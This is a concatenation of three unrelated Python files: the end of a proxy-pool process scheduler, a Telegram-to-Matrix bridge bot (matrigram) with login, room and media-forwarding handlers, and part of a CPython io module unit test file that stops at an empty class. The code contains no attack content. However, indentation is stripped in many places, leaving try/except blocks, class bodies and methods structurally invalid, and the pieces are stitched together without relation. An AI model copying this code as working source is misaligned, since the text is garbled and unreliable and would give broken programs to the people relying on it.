                getter_process = multiprocessing.Process(target=self.run_getter)
                getter_process.start()
                logger.info(f'started getter, pid {getter_process.pid}...')
            if ENABLE_SERVER:
                server_process = multiprocessing.Process(target=self.run_server)
                server_process.start()
                logger.info(f'started server, pid {server_process.pid}...')
            for process in (tester_process, getter_process, server_process):
                if process is not None:
                    process.join()
except KeyboardInterrupt:
logger.info('received keyboard interrupt signal')
            for process in (tester_process, getter_process, server_process):
                if process is not None:
                    process.terminate()
finally:
# must call join method before calling is_alive
            for name, process in (('tester', tester_process), ('getter', getter_process), ('server', server_process)):
                if process is not None:
                    process.join()
                    logger.info(f'{name} is {"alive" if process.is_alive() else "dead"}')
logger.info('proxy terminated')
if __name__ == '__main__':
scheduler = Scheduler()
scheduler.run()
|
bot.py
|
# -*- coding: utf-8 -*-
import logging
import os
import re
import time
from threading import Lock
from threading import Thread
import requests
import telepot
from . import helper
from .helper import download_file
from .helper import pprint_json
from .client import MatrigramClient
BOT_BASE_URL = 'https://api.telegram.org/bot{token}/{path}'
BOT_FILE_URL = 'https://api.telegram.org/file/bot{token}/{file_path}'
logger = logging.getLogger('matrigram')
OPTS_IN_ROW = 4
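# Handler decorators: logged_in requires an active MatrigramClient session for the
# chat, and focused additionally requires at least one joined room plus a focus room.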
def logged_in(func):
def func_wrapper(self, msg, *args):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
if client is None:
self.sendMessage(chat_id,
'You are not logged in. Login to start with /login username password')
return
func(self, msg, *args)
return func_wrapper
def focused(func):
def func_wrapper(self, msg, *args):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
if not client.get_rooms_aliases():
self.sendMessage(chat_id, 'You are not in any room. Type /join #room to join one.')
return
if not client.have_focus_room():
self.sendMessage(chat_id, 'You don\'t have a room in focus. Type /focus to choose one.')
return
func(self, msg, *args)
return func_wrapper
class MatrigramBot(telepot.Bot):
def __init__(self, *args, **kwargs):
config = kwargs.pop('config')
super(MatrigramBot, self).__init__(*args, **kwargs)
routes = [
(r'^/login (?P<username>\S+) (?P<password>\S+)$', self.login),
(r'^/logout$', self.logout),
(r'^/join\s(?P<room_name>[^$]+)$', self.join_room),
(r'^/leave$', self.leave_room),
(r'^/discover$', self.discover_rooms),
(r'^/focus$', self.change_focus_room),
(r'^/status$', self.status),
(r'^/members$', self.get_members),
(r'^/create_room (?P<room_name>[\S]+)(?P<invitees>\s.*\S)*$', self.create_room),
(r'^/setname\s(?P<matrix_name>[^$]+)$', self.set_name),
(r'^/me (?P<text>[^/].*)$', self.emote),
(r'^(?P<text>[^/].*)$', self.forward_message_to_mc),
]
callback_query_routes = [
(r'^LEAVE (?P<room>\S+)$', self.do_leave),
(r'^FOCUS (?P<room>\S+)$', self.do_change_focus),
(r'^JOIN (?P<room>\S+)$', self.do_join),
(r'^NOP$', self.do_nop),
]
self.routes = [(re.compile(pattern), callback) for pattern, callback in routes]
self.callback_query_routes = [(re.compile(pattern), callback)
for pattern, callback in callback_query_routes]
self.content_type_routes = {
'text': self.on_text_message,
'photo': self.forward_photo_to_mc,
'voice': self.forward_voice_to_mc,
'video': self.forward_video_to_mc,
'document': self.forward_gif_to_mc,
}
# users map telegram_id -> client
self.users = {}
self.config = config
self.users_lock = Lock() # self.users lock for typing related matters
def on_chat_message(self, msg):
"""Main entry point.
This function is our main entry point to the bot.
Messages will be routed according to their content type.
Args:
msg: The message object received from telegram user.
"""
content_type, _, _ = telepot.glance(msg)
logger.debug('content type: %s', content_type)
self.content_type_routes[content_type](msg)
def on_callback_query(self, msg):
"""Handle callback queries.
Route queries using ``self.callback_query_routes``.
Args:
msg: The message object received from telegram user.
"""
data = msg['data']
for route, callback in self.callback_query_routes:
match = route.match(data)
if match:
callback_thread = Thread(target=callback, args=(msg, match))
callback_thread.start()
break
def on_text_message(self, msg):
"""Handle text messages.
Route text messages using ``self.routes``.
Args:
msg: The message object received from telegram user.
"""
text = msg['text'].encode('utf-8')
for route, callback in self.routes:
match = route.match(text)
if match:
callback_thread = Thread(target=callback, args=(msg, match))
callback_thread.start()
# wait for login thread to finish before moving on
if callback == self.login:
callback_thread.join()
break
def login(self, msg, match):
"""Perform login.
Args:
msg: The message object received from telegram user.
match: Match object containing extracted data.
"""
username = match.group('username')
password = match.group('password')
chat_id = msg['chat']['id']
logger.info('telegram user %s, login to %s', chat_id, username)
self.sendChatAction(chat_id, 'typing')
client = MatrigramClient(self.config['server'], self, username)
login_bool, login_message = client.login(username, password)
if login_bool:
self.sendMessage(chat_id, 'Logged in as {}'.format(username))
self.users[chat_id] = {
'client': client,
'typing_thread': None,
'should_type': False,
}
rooms = client.get_rooms_aliases()
logger.debug("rooms are: %s", rooms)
if rooms:
room_aliases = '\n'.join([room_alias[0] for room_alias in rooms.values()])
self.sendMessage(chat_id, 'You are currently in rooms:\n{}'.format(room_aliases))
self.sendMessage(chat_id,
'You are now participating in: {}'.format(
client.get_focus_room_alias()))
logger.debug('%s user state:\n%s', chat_id, self.users[chat_id])
else:
self.sendMessage(chat_id, login_message)
@logged_in
def logout(self, msg, _):
"""Perform logout.
Args:
msg: The message object received from telegram user.
"""
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
logger.info('logout %s', chat_id)
client.logout()
self.users[chat_id]['client'] = None
@logged_in
def join_room(self, msg, match):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
room_name = match.group('room_name')
ret = client.join_room(room_name)
if not ret:
self.sendMessage(chat_id, 'Can\'t join room')
else:
self.sendMessage(chat_id, "Joined {}".format(room_name))
@logged_in
def leave_room(self, msg, _):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
rooms = [room[0] for dummy_room_id, room in client.get_rooms_aliases().items()]
if not rooms:
self.sendMessage(chat_id, 'Nothing to leave...')
return
opts = [{'text': room, 'callback_data': 'LEAVE {}'.format(room)} for room in rooms]
keyboard = {
'inline_keyboard': [chunk for chunk in helper.chunks(opts, OPTS_IN_ROW)]
}
self.sendMessage(chat_id, 'Choose a room to leave:', reply_markup=keyboard)
def do_leave(self, msg, match):
query_id, _, _ = telepot.glance(msg, flavor='callback_query')
chat_id = msg['message']['chat']['id']
room_name = match.group('room')
client = self._get_client(chat_id)
prev_focus_room = client.get_focus_room_alias()
client.leave_room(room_name)
self.sendMessage(chat_id, 'Left {}'.format(room_name))
curr_focus_room = client.get_focus_room_alias()
if curr_focus_room != prev_focus_room and curr_focus_room is not None:
self.sendMessage(chat_id,
'You are now participating in: {}'.format(
client.get_focus_room_alias()))
self.answerCallbackQuery(query_id, 'Done!')
@logged_in
def change_focus_room(self, msg, _):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
rooms = [room[0] for dummy_room_id, room in client.get_rooms_aliases().items()]
if not rooms:
self.sendMessage(chat_id, 'You need to be at least in one room to use this command.')
return
opts = [{'text': room, 'callback_data': 'FOCUS {}'.format(room)} for room in rooms]
keyboard = {
'inline_keyboard': [chunk for chunk in helper.chunks(opts, OPTS_IN_ROW)]
}
self.sendMessage(chat_id, 'Choose a room to focus:', reply_markup=keyboard)
def do_change_focus(self, msg, match):
query_id, _, _ = telepot.glance(msg, flavor='callback_query')
chat_id = msg['message']['chat']['id']
room_name = match.group('room')
self.sendChatAction(chat_id, 'typing')
client = self._get_client(chat_id)
client.set_focus_room(room_name)
self.sendMessage(chat_id, 'You are now participating in {}'.format(room_name))
self.sendMessage(chat_id, '{} Room history:'.format(room_name))
client.backfill_previous_messages()
self.answerCallbackQuery(query_id, 'Done!')
def do_join(self, msg, match):
query_id, _, _ = telepot.glance(msg, flavor='callback_query')
chat_id = msg['message']['chat']['id']
room_name = match.group('room')
self.sendChatAction(chat_id, 'typing')
client = self._get_client(chat_id)
ret = client.join_room(room_name)
if not ret:
self.answerCallbackQuery(query_id, 'Can\'t join room')
else:
self.answerCallbackQuery(query_id, 'Joined {}'.format(room_name))
def do_nop(self, msg, _):
query_id, _, _ = telepot.glance(msg, flavor='callback_query')
chat_id = msg['message']['chat']['id']
self.sendChatAction(chat_id, 'typing')
self.answerCallbackQuery(query_id, 'OK Boss!')
@logged_in
def status(self, msg, _):
chat_id = msg['chat']['id']
self.sendChatAction(chat_id, 'typing')
client = self._get_client(chat_id)
focus_room = client.get_focus_room_alias()
joined_rooms = client.get_rooms_aliases()
joined_rooms_list = [val[0] for dummy_room_id, val in joined_rooms.items()]
message = '''Status:
Focused room: {}
Joined rooms: {}'''.format(focus_room, helper.list_to_nice_str(joined_rooms_list))
self.sendMessage(chat_id, message)
@logged_in
@focused
def get_members(self, msg, _):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
members = client.get_members()
# TODO: figure out how to avoid overly long messages; for now send only the first 10 members
self.sendMessage(chat_id, helper.list_to_nice_str(members[0:10]))
@logged_in
def discover_rooms(self, msg, _):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
rooms = client.discover_rooms()
self.sendMessage(chat_id, helper.list_to_nice_lines(rooms))
@logged_in
def create_room(self, msg, match):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
room_alias = match.group('room_name')
invitees = match.group('invitees')
invitees = invitees.split() if invitees else None
room_id, actual_alias = client.create_room(room_alias, is_public=True, invitees=invitees)
if room_id:
self.sendMessage(chat_id,
'Created room {} with room id {}'.format(actual_alias, room_id))
self.sendMessage(chat_id,
'Invitees for the room are {}'.format(
helper.list_to_nice_str(invitees)))
else:
self.sendMessage(chat_id, 'Could not create room')
@logged_in
@focused
def forward_message_to_mc(self, msg, match):
text = match.group('text')
chat_id = msg['chat']['id']
from_user = msg['from'].get('username')
if from_user and chat_id < 0:
text = '{}: {}'.format(from_user, text)
client = self._get_client(chat_id)
client.send_message(text)
@logged_in
@focused
def forward_photo_to_mc(self, msg):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
logger.debug(pprint_json(msg))
file_id = msg['photo'][-1]['file_id']
file_obj = self.getFile(file_id)
file_path = file_obj['file_path']
file_name = os.path.split(file_path)[1]
link = BOT_FILE_URL.format(token=self._token, file_path=file_path)
download_file(link, os.path.join(self.config['media_dir'], file_name))
client.send_photo(os.path.join(self.config['media_dir'], file_name))
@logged_in
@focused
def forward_voice_to_mc(self, msg):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
file_id = msg['voice']['file_id']
file = self.getFile(file_id)
file_path = file['file_path']
file_name = os.path.split(file_path)[1]
link = BOT_FILE_URL.format(token=self._token, file_path=file_path)
path = os.path.join(self.config['media_dir'], file_name)
download_file(link, path)
client.send_voice(path)
@logged_in
@focused
def forward_video_to_mc(self, msg):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
file_id = msg['video']['file_id']
file = self.getFile(file_id)
file_path = file['file_path']
file_name = os.path.split(file_path)[1]
link = BOT_FILE_URL.format(token=self._token, file_path=file_path)
path = os.path.join(self.config['media_dir'], file_name)
download_file(link, path)
client.send_video(path)
# gifs are mp4 in telegram
@logged_in
@focused
def forward_gif_to_mc(self, msg):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
file_id = msg['document']['file_id']
file = self.getFile(file_id)
file_path = file['file_path']
file_name = os.path.split(file_path)[1]
link = BOT_FILE_URL.format(token=self._token, file_path=file_path)
path = os.path.join(self.config['media_dir'], file_name)
download_file(link, path)
client.send_video(path)
def send_message(self, sender, msg, client):
"""Send message to telegram user.
Args:
sender (str): Name of the sender.
msg (str): Text message.
client (MatrigramClient): The client the message is originated in.
Returns:
"""
chat_id = self._get_chat_id(client)
if not chat_id:
return
self.sendChatAction(chat_id, 'typing')
self.sendMessage(chat_id, "{}: {}".format(sender, msg))
def send_emote(self, sender, msg, client):
chat_id = self._get_chat_id(client)
if not chat_id:
return
self.sendChatAction(chat_id, 'typing')
self.sendMessage(chat_id, '* {} {}'.format(sender, msg))
def send_topic(self, sender, topic, client):
chat_id = self._get_chat_id(client)
if not chat_id:
return
self.sendChatAction(chat_id, 'typing')
self.sendMessage(chat_id, "{} changed topic to: \"{}\"".format(sender, topic))
def send_kick(self, room, client):
logger.info('got kicked from %s', room)
chat_id = self._get_chat_id(client)
if not chat_id:
return
self.sendMessage(chat_id, 'You got kicked from {}'.format(room))
client.set_focus_room(None)
@logged_in
def set_name(self, msg, match):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
name = match.group('matrix_name')
client.set_name(name)
self.sendMessage(chat_id, 'Set matrix display name to: {}'.format(name))
@logged_in
@focused
def emote(self, msg, match):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
body = match.group('text')
client.emote(body)
def send_invite(self, client, room):
logger.info('join room %s?', room)
chat_id = self._get_chat_id(client)
if not chat_id:
return
keyboard = {
'inline_keyboard': [
[
{
'text': 'Yes',
'callback_data': 'JOIN {}'.format(room),
},
{
'text': 'No',
'callback_data': 'NOP',
}
]
]
}
self.sendMessage(chat_id, 'You have been invited to room {}, accept?'.format(room),
reply_markup=keyboard)
# Temporary fixes tend to become permanent, so let's do it the hard way.
def _workaround_sendPhoto(self, sender, path, chat_id):
payload = {
'chat_id': chat_id,
'caption': sender,
}
files = {
'photo': open(path, 'rb')
}
base_url = BOT_BASE_URL.format(token=self._token, path='sendPhoto')
requests.post(base_url, params=payload, files=files)
def _workaround_sendAudio(self, sender, path, chat_id):
payload = {
'chat_id': chat_id,
'caption': sender,
}
files = {
'audio': open(path, 'rb')
}
base_url = BOT_BASE_URL.format(token=self._token, path='sendAudio')
requests.post(base_url, params=payload, files=files)
def _workaround_sendVideo(self, sender, path, chat_id):
payload = {
'chat_id': chat_id,
'caption': sender,
}
files = {
'video': open(path, 'rb')
}
base_url = BOT_BASE_URL.format(token=self._token, path='sendVideo')
requests.post(base_url, params=payload, files=files)
def send_photo(self, sender, path, client):
logger.info('path = %s', path)
chat_id = self._get_chat_id(client)
if not chat_id:
return
self.sendChatAction(chat_id, 'upload_photo')
self._workaround_sendPhoto(sender, path, chat_id)
# self.sendPhoto(chat_id, open(path, 'rb'))
def send_voice(self, sender, path, client):
logger.info('path = %s', path)
chat_id = self._get_chat_id(client)
if not chat_id:
return
self.sendChatAction(chat_id, 'upload_audio')
self._workaround_sendAudio(sender, path, chat_id)
def send_video(self, sender, path, client):
logger.info('path = %s', path)
chat_id = self._get_chat_id(client)
if not chat_id:
return
self.sendChatAction(chat_id, 'upload_video')
self._workaround_sendVideo(sender, path, chat_id)
def relay_typing(self, chat_id):
"""Keep sending the 'typing' chat action until should_type is cleared.
Runs in a dedicated thread started by start_typing_thread().
Args:
chat_id: Telegram chat id to send the action to.
"""
while True:
with self.users_lock:
if not self.users[chat_id]['should_type']:
return
self.sendChatAction(chat_id, 'typing')
time.sleep(2)
def start_typing_thread(self, client):
chat_id = self._get_chat_id(client)
with self.users_lock:
if self.users[chat_id]['typing_thread']:
return
typing_thread = Thread(target=self.relay_typing, args=(chat_id,))
self.users[chat_id]['should_type'] = True
typing_thread.start()
self.users[chat_id]['typing_thread'] = typing_thread
def stop_typing_thread(self, client):
chat_id = self._get_chat_id(client)
with self.users_lock:
if not self.users[chat_id]['typing_thread']:
return
typing_thread = self.users[chat_id]['typing_thread']
self.users[chat_id]['should_type'] = False
typing_thread.join()
with self.users_lock:
self.users[chat_id]['typing_thread'] = None
def _get_client(self, chat_id):
"""Get matrigram client.
Args:
chat_id: Telegram user id.
Returns:
MatrigramClient: The client associated to the telegram user with `chat_id`.
"""
try:
return self.users[chat_id]['client']
except KeyError:
logger.error('chat_id %s does not exist', chat_id)
return None
def _get_chat_id(self, client):
"""Get telegram id associated with client.
Args:
client (MatrigramClient): The client to be queried.
Returns:
str: The `chat_id` associated to the client.
"""
for chat_id, user in self.users.items():
if user['client'] == client:
return chat_id
logger.error('no telegram user is associated with this client')
return None
|
test_io.py
|
"""Unit tests for io.py."""
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import time
import array
import threading
import random
import unittest
from itertools import chain, cycle
from test import test_support
import codecs
import io # The module under test
class MockRawIO(io.RawIOBase):
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
def read(self, n=None):
try:
return self._read_stack.pop(0)
except IndexError:
return b""
def write(self, b):
self._write_stack.append(b[:])
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
pass
def tell(self):
return 42
class MockFileIO(io.BytesIO):
def __init__(self, data):
self.read_history = []
io.BytesIO.__init__(self, data)
def read(self, n=None):
res = io.BytesIO.read(self, n)
self.read_history.append(None if res is None else len(res))
return res
class MockNonBlockWriterIO(io.RawIOBase):
def __init__(self, blocking_script):
self._blocking_script = list(blocking_script)
self._write_stack = []
def write(self, b):
self._write_stack.append(b[:])
n = self._blocking_script.pop(0)
if n < 0:
raise io.BlockingIOError(0, "test blocking", -n)
else:
return n
def writable(self):
return True
class IOTest(unittest.TestCase):
def tearDown(self):
test_support.unlink(test_support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
self.assertEqual(f.write(bytearray(b" world\n\n\n")), 9)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 12)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = bytearray(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(data, b" worl")
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(bytearray(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(bytearray()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
self.assertEqual(f.seek(self.LARGE), self.LARGE)
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 1)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_raw_file_io(self):
f = io.open(test_support.TESTFN, "wb", buffering=0)
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
f.close()
f = io.open(test_support.TESTFN, "rb", buffering=0)
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
f.close()
def test_buffered_file_io(self):
f = io.open(test_support.TESTFN, "wb")
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
f.close()
f = io.open(test_support.TESTFN, "rb")
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
f.close()
def test_readline(self):
f = io.open(test_support.TESTFN, "wb")
f.write(b"abc\ndef\nxyzzy\nfoo")
f.close()
f = io.open(test_support.TESTFN, "rb")
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo")
f.close()
def test_raw_bytes_io(self):
f = io.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = io.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OS X this test consumes large resources; it takes
# a long time to build the >2GB file and requires >2GB of disk space,
# therefore the "largefile" resource must be enabled to run this test.
if sys.platform[:3] in ('win', 'os2') or sys.platform == 'darwin':
if not test_support.is_resource_enabled("largefile"):
print("\nTesting large file ops skipped on %s." % sys.platform,
file=sys.stderr)
print("It requires %d bytes and a long time." % self.LARGE,
file=sys.stderr)
print("Use 'regrtest.py -u largefile test_io' to run it.",
file=sys.stderr)
return
f = io.open(test_support.TESTFN, "w+b", 0)
self.large_file_ops(f)
f.close()
f = io.open(test_support.TESTFN, "w+b")
self.large_file_ops(f)
f.close()
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with open(test_support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with open(test_support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with io.open(test_support.TESTFN, "wb") as f:
f.write(b"xxx")
with io.open(test_support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with io.open(test_support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with io.open(test_support.TESTFN, "a") as f:
self.assert_(f.tell() > 0)
def test_destructor(self):
record = []
class MyFileIO(io.FileIO):
def __del__(self):
record.append(1)
io.FileIO.__del__(self)
def close(self):
record.append(2)
io.FileIO.close(self)
def flush(self):
record.append(3)
io.FileIO.flush(self)
f = MyFileIO(test_support.TESTFN, "w")
f.write("xxx")
del f
self.assertEqual(record, [1, 2, 3])
def test_close_flushes(self):
f = io.open(test_support.TESTFN, "wb")
f.write(b"xxx")
f.close()
f = io.open(test_support.TESTFN, "rb")
self.assertEqual(f.read(), b"xxx")
f.close()
def XXXtest_array_writes(self):
# XXX memory view not available yet
a = array.array('i', range(10))
n = len(memoryview(a))
f = io.open(test_support.TESTFN, "wb", 0)
self.assertEqual(f.write(a), n)
f.close()
f = io.open(test_support.TESTFN, "wb")
self.assertEqual(f.write(a), n)
f.close()
def test_closefd(self):
self.assertRaises(ValueError, io.open, test_support.TESTFN, 'w',
closefd=False)
def testReadClosed(self):
with io.open(test_support.TESTFN, "w") as f:
f.write("egg\n")
with io.open(test_support.TESTFN, "r") as f:
file = io.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError,
io.open, test_support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with io.open(test_support.TESTFN, "wb") as f:
f.write(b"egg\n")
with io.open(test_support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = io.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
class MemorySeekTestMixin:
def testInit(self):
buf = self.buftype("1234567890")
bytesIo = self.ioclass(buf)
def testRead(self):
buf = self.buftype("1234567890")
bytesIo = self.ioclass(buf)
self.assertEquals(buf[:1], bytesIo.read(1))
self.assertEquals(buf[1:5], bytesIo.read(4))
self.assertEquals(buf[5:], bytesIo.read(900))
self.assertEquals(self.EOF, bytesIo.read())
def testReadNoArgs(self):
buf = self.buftype("1234567890")
bytesIo = self.ioclass(buf)
self.assertEquals(buf, bytesIo.read())
self.assertEquals(self.EOF, bytesIo.read())
def testSeek(self):
buf = self.buftype("1234567890")
bytesIo = self.ioclass(buf)
bytesIo.read(5)
bytesIo.seek(0)
self.assertEquals(buf, bytesIo.read())
bytesIo.seek(3)
self.assertEquals(buf[3:], bytesIo.read())
self.assertRaises(TypeError, bytesIo.seek, 0.0)
def testTell(self):
buf = self.buftype("1234567890")
bytesIo = self.ioclass(buf)
self.assertEquals(0, bytesIo.tell())
bytesIo.seek(5)
self.assertEquals(5, bytesIo.tell())
bytesIo.seek(10000)
self.assertEquals(10000, bytesIo.tell())
class BytesIOTest(MemorySeekTestMixin, unittest.TestCase):
@staticmethod
def buftype(s):
return s.encode("utf-8")
ioclass = io.BytesIO
EOF = b""
class StringIOTest(MemorySeekTestMixin, unittest.TestCase):
buftype = str
ioclass = io.StringIO
EOF = ""
class BufferedReaderTest(unittest.TestCase):
def testRead(self):
rawio = MockRawIO((b"abc", b"d", b"efg"))
bufio = io.BufferedReader(rawio)
self.assertEquals(b"abcdef", bufio.read(6))
def testBuffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = MockFileIO(data)
bufio = io.BufferedReader(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEquals(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
self.assertEquals(rawio.read_history, raw_read_sizes)
def testReadNonBlocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = MockRawIO((b"abc", b"d", None, b"efg", None, None))
bufio = io.BufferedReader(rawio)
self.assertEquals(b"abcd", bufio.read(6))
self.assertEquals(b"e", bufio.read(1))
self.assertEquals(b"fg", bufio.read())
self.assert_(None is bufio.read())
self.assertEquals(b"", bufio.read())
def testReadToEof(self):
rawio = MockRawIO((b"abc", b"d", b"efg"))
bufio = io.BufferedReader(rawio)
self.assertEquals(b"abcdefg", bufio.read(9000))
def testReadNoArgs(self):
rawio = MockRawIO((b"abc", b"d", b"efg"))
bufio = io.BufferedReader(rawio)
self.assertEquals(b"abcdefg", bufio.read())
def testFileno(self):
rawio = MockRawIO((b"abc", b"d", b"efg"))
bufio = io.BufferedReader(rawio)
self.assertEquals(42, bufio.fileno())
def testFilenoNoFileno(self):
# XXX will we always have fileno() function? If so, kill
# this test. Else, write it.
pass
def testThreads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = range(256) * N
random.shuffle(l)
s = bytes(bytearray(l))
with io.open(test_support.TESTFN, "wb") as f:
f.write(s)
with io.open(test_support.TESTFN, "rb", buffering=0) as raw:
bufio = io.BufferedReader(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
test_support.unlink(test_support.TESTFN)
class BufferedWriterTest(unittest.TestCase):
def testWrite(self):
# Write to the buffered IO but don't overflow the buffer.
writer = MockRawIO()
bufio = io.BufferedWriter(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
def testWriteOverflow(self):
writer = MockRawIO()
bufio = io.BufferedWriter(writer, 8)
bufio.write(b"abc")
bufio.write(b"defghijkl")
self.assertEquals(b"abcdefghijkl", writer._write_stack[0])
def testWriteNonBlocking(self):
raw = MockNonBlockWriterIO((9, 2, 22, -6, 10, 12, 12))
bufio = io.BufferedWriter(raw, 8, 16)
bufio.write(b"asdf")
bufio.write(b"asdfa")
self.assertEquals(b"asdfasdfa", raw._write_stack[0])
bufio.write(b"asdfasdfasdf")
self.assertEquals(b"asdfasdfasdf", raw._write_stack[1])
bufio.write(b"asdfasdfasdf")
self.assertEquals(b"dfasdfasdf", raw._write_stack[2])
self.assertEquals(b"asdfasdfasdf", raw._write_stack[3])
bufio.write(b"asdfasdfasdf")
# XXX I don't like this test. It relies too heavily on how the
# algorithm actually works, which we might change. Refactor
# later.
def testFileno(self):
rawio = MockRawIO((b"abc", b"d", b"efg"))
bufio = io.BufferedWriter(rawio)
self.assertEquals(42, bufio.fileno())
def testFlush(self):
writer = MockRawIO()
bufio = io.BufferedWriter(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEquals(b"abc", writer._write_stack[0])
def testThreads(self):
# BufferedWriter should not raise exceptions or crash
# when called from multiple threads.
try:
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with io.open(test_support.TESTFN, "wb", buffering=0) as raw:
bufio = io.BufferedWriter(raw, 8)
errors = []
def f():
try:
# Write enough bytes to flush the buffer
s = b"a" * 19
for i in range(50):
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
finally:
test_support.unlink(test_support.TESTFN)
class BufferedRWPairTest(unittest.TestCase):
def testRWPair(self):
r = MockRawIO(())
w = MockRawIO()
pair = io.BufferedRWPair(r, w)
self.assertFalse(pair.closed)
# XXX More Tests
class BufferedRandomTest(unittest.TestCase):
